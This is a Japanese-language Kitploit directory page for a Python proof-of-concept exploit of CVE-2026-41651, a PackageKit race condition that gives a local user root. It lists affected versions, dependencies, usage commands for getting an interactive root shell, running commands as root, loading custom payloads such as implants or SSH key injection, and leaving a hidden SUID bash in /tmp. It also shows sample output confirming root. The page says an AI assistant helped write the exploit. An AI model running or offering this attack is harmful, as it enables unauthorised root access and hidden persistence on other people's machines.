Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41651-Python — CVE-2026-41651のPython概念実証エクスプロイト。PackageKitにおけるTOCTOUローカル権限昇格脆弱性であり、権限のないユーザーがrootとしてパッケージをインストール可能にする。チェックモード、カスタムペイロード対応、SUID bashドロッパーを含む。 | Kitploit
ツール/GitHubGitHub/mawussid/cve-2026-41651-python
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ペイロード開発
GitHubmawussid/cve-2026-41651-python

CVE-2026-41651-Python

CVE-2026-41651のPython概念実証エクスプロイト。PackageKitにおけるTOCTOUローカル権限昇格脆弱性であり、権限のないユーザーがrootとしてパッケージをインストール可能にする。チェックモード、カスタムペイロード対応、SUID bashドロッパーを含む。

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Pack2TheRoot: CVE-2026-41651 (Python)

PackageKit TOCTOU ローカル特権昇格エクスプロイトの Python PoC。 ローカルの非特権ユーザーは、認証なしで任意のパッケージを root としてインストールできます。

フィールド値
CVECVE-2026-41651
コンポーネントPackageKit デーモン (packagekitd)
影響を受けるバージョン1.0.2 – 1.3.4
修正バージョン1.3.5
影響ローカル特権昇格 → root

免責事項

このツールは教育および許可されたセキュリティ研究目的のみで提供されます。


必要条件

脆弱なOS: PackageKit >= 1.0.2 <= 1.3.4 を実行している任意の Linux ディストリビューション。

PoC の制限: 内蔵パッケージビルダーは .deb ファイルのみを生成するため、スクリプトをそのまま実行するには Debian/Ubuntu ホストが必要です。RPM ベースのシステムでは、--payload-script でカスタム postinst ペイロードを指定し、dpkg/dpkg-dev が利用可能であることを確認するか、ビルダーを適応させてください。

Python: 3.6+

システムパッケージ (Debian/Ubuntu):

root@kitploit:~
sudo apt install python3-dbus python3-gi gir1.2-glib-2.0

依存関係に関する注意: python3-dbus と python3-gi は Python 標準ライブラリではありませんが、グラフィカルデスクトップ環境 (GNOME, KDE, XFCE など) を実行しているほとんどのマシンには既に存在します。これらの環境はそれらに直接依存しているためです。標準の Ubuntu Desktop インストールでは、手動インストールなしで両方のライブラリが利用可能です。GUI のない最小限のサーバーでは存在しない可能性があるため、その場合上記の apt install には sudo が必要となり、LPE の文脈と矛盾します。実際には、PackageKit をデスクトップセッションで実行しているマシンでは、これらの依存関係は既に満たされています。

gir1.2-glib-2.0 は GLib 用の GObject Introspection タイプライブラリファイルを提供します。python3-gi は Python バインディングエンジンですが、GLib と会話するためにこれらのタイプライブラリファイルが必要です。このパッケージがないと、python3-gi がインストールされていても from gi.repository import GLib が失敗します。どちらも GNOME ベースのデスクトップでは自動的に導入されます。

stdlib のみの試みに関する注意: この PoC の以前のバージョンでは、D-Bus 呼び出しを gdbus/dbus-send サブプロセスに置き換え、その後 Unix ソケット上で D-Bus ワイヤプロトコルを直接話すことで、これらの依存関係を完全に排除しようと試みました。どちらのアプローチも TOCTOU レースを確実に引き起こすことに失敗しました。外部プロセスを生成すると、2 回の InstallFiles 呼び出しの間に十分なレイテンシが生じ、PackageKit が Step 2 が到着する前に Step 1 を処理してしまい、レースが崩れます。dbus-python バインディングは、両方の呼び出しを同じ既に開いているソケット上でフォークオーバーヘッドなしに fire-and-forget で送信するため、タイミングがうまく機能します。stdlib のみのバージョンはこの理由で元に戻されました。

PackageKit バージョンの確認 (PoC なし):

root@kitploit:~
pkcon --version 2>/dev/null || dpkg -l packagekit | grep ^ii

使用方法

root@kitploit:~
usage: cve-2026-41651.py [-h] [--check] [--exec CMD]
                         [--payload-script FILE] [--suid-path PATH]
                         [--no-cleanup] [--timeout N] [--quiet]

例:

root@kitploit:~
# Check if the target is vulnerable (no exploit)
python3 cve-2026-41651.py --check

# Full exploit → interactive root shell
python3 cve-2026-41651.py

# Run a single command as root
python3 cve-2026-41651.py --exec "id"

# Custom payload (implant, SSH key injection…)
python3 cve-2026-41651.py --payload-script /tmp/hook.sh

# Keep the SUID bash after exit, custom path
python3 cve-2026-41651.py --suid-path /tmp/.mybash --no-cleanup

# Scriptable / fast mode
python3 cve-2026-41651.py --timeout 60 --quiet

期待される出力:

root@kitploit:~
═══════════════════════════════════════════════════
 CVE-2026-41651 / PackageKit TOCTOU LPE
═══════════════════════════════════════════════════
[*] Building packages (pure Python)...
[+] dummy   : /tmp/.pk-dummy-1337.deb
[+] payload : /tmp/.pk-payload-1337.deb
[*] Transaction : /1_acdcacbe
[*] Step 1 : InstallFiles(SIMULATE=0x4, dummy) [async]
[*] Step 2 : InstallFiles(NONE=0x0, payload) [async]
[*] Waiting for dispatch (30 s max)...
[!] PK error 48: Failed to obtain authentication.
[*] Finished (exit=2, 10 ms)
[*] Polling for payload (120 s max)...

[+] SUCCESS: SUID bash at t+200ms
uid=1001(victim) gid=1001(victim) euid=0(root) groups=1001(victim)

クレジット

元の C PoC は Vozec によるものです。 これは移植性のための Python による書き直しです。エクスプロイト技術のすべての功績は原作者に帰属します。

Python の書き直しは Claude (Anthropic) の支援を受けて開発されました。

ツールをダウンロード
フラグ説明
--checkPackageKit のバージョンを照会し、脆弱性を報告して終了
--exec CMDインタラクティブシェルの代わりに root として単一のコマンドを実行
--payload-script FILE内蔵の SUID bash ドロッパーの代わりにカスタム postinst スクリプトを使用
--suid-path PATHSUID bash を配置するパス(デフォルト: /tmp/.suid_bash)
--no-cleanupシェル終了後も SUID bash を保持
--timeout NSUID bash をポーリングする秒数(デフォルト: 120)
--quiet進捗出力を抑制(スクリプト用)